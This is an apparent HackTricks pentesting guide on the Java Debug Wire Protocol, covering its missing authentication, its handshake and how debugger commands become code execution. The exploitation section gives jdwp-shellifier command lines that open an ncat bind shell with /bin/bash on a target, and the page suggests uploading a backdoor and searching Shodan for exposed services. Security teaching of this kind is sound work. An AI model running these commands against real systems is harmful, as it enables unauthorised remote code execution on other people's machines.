pentesting-jdwp-java-debug-wire-protocol.md (4985B)
1 --- 2 title: "Pentesting JDWP - Java Debug Wire Protocol" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Pentesting JDWP - Java Debug Wire Protocol 14 15 ## Exploiting 16 17 JDWP provides debugger-level control and the wire protocol itself has no authentication or encryption. A listening `dt_socket` transport may be bound to any configured address and port; 8000 is only a common convention. The debugger sends the 14-byte ASCII string `JDWP-Handshake`, and a JDWP peer replies with the same string.<sup>[[3]](#references)[[4]](#references)</sup> 18 19 Locally, inspect Java command lines for `-agentlib:jdwp`, legacy `-Xrunjdwp`, or `jdwp` rather than the typo `jdwk`. Binding only to loopback or using an SSH tunnel reduces exposure but does not add protocol authentication. 20 21 `jdwp-shellifier` is a common exploitation client. The maintained Hugsy fork retains the original IOActive technique and command-line interface:<sup>[[2]](#references)[[9]](#references)</sup> 22 23 ```bash 24 ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data 25 ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something 26 ./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept 27 ``` 28 29 I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploit more **stable**. And if you have the chance to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable. 30 31 ## More details 32 33 **This is a summary of [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Check it for further details.<sup>[[1]](#references)</sup> 34 35 1. **JDWP Overview**: 36 37 - It is a packet-based binary protocol; most commands use a synchronous request/reply model, while events are asynchronous.<sup>[[3]](#references)[[4]](#references)</sup> 38 - Lacks authentication and encryption, making it vulnerable when exposed to hostile networks. 39 40 2. **JDWP Handshake**: 41 42 - A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server). 43 44 3. **JDWP Communication**: 45 46 - Messages have fields such as length, ID, flags, and command set.<sup>[[4]](#references)</sup> 47 - CommandSet values range from 0x40 to 0x80, representing different actions and events. 48 49 4. **Exploitation**: 50 51 - Debugger commands can inspect classes, set breakpoints, create values, and invoke methods; exploit tools compose these primitives into command execution.<sup>[[5]](#references)</sup> 52 - The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods. 53 54 5. **Real-Life Exploitation**: 55 56 - Exposed services and unsafe launch configurations can be found through asset search and code/configuration review.<sup>[[7]](#references)[[8]](#references)</sup> 57 - The original exploit was tested across several historical JDK versions and operating systems, but command execution still requires a suitable loaded class, breakpoint/event, permissions, and target runtime behavior.<sup>[[6]](#references)</sup> 58 59 6. **Security Implications**: 60 - The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations. 61 62 ## References 63 64 - [1] [Hacking the Java Debug Wire Protocol – or – "How I met your Java debugger"](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/) 65 - [2] [IOActive/jdwp-shellifier GitHub repository](https://github.com/IOActive/jdwp-shellifier) 66 - [3] [Oracle — Java Platform Debugger Architecture](https://docs.oracle.com/en/java/javase/21/docs/specs/jpda/architecture.html) 67 - [4] [Oracle — Java Debug Wire Protocol specification](https://docs.oracle.com/en/java/javase/21/docs/specs/jdwp/jdwp-protocol.html) 68 - [5] [Nmap — `jdwp-exec` NSE script](https://nmap.org/nsedoc/scripts/jdwp-exec.html) 69 - [6] [Packet Storm — JDWP exploitation paper and PoC](https://packetstormsecurity.com/files/122525/JDWP-exploitation.txt) 70 - [7] [Shodan search — JDWP-Handshake](https://www.shodan.io/search?query=JDWP-Handshake) 71 - [8] [GitHub code search — JDWP launch options](https://github.com/search?q=%22-Xrunjdwp%22&type=code) 72 - [9] [hugsy/jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier)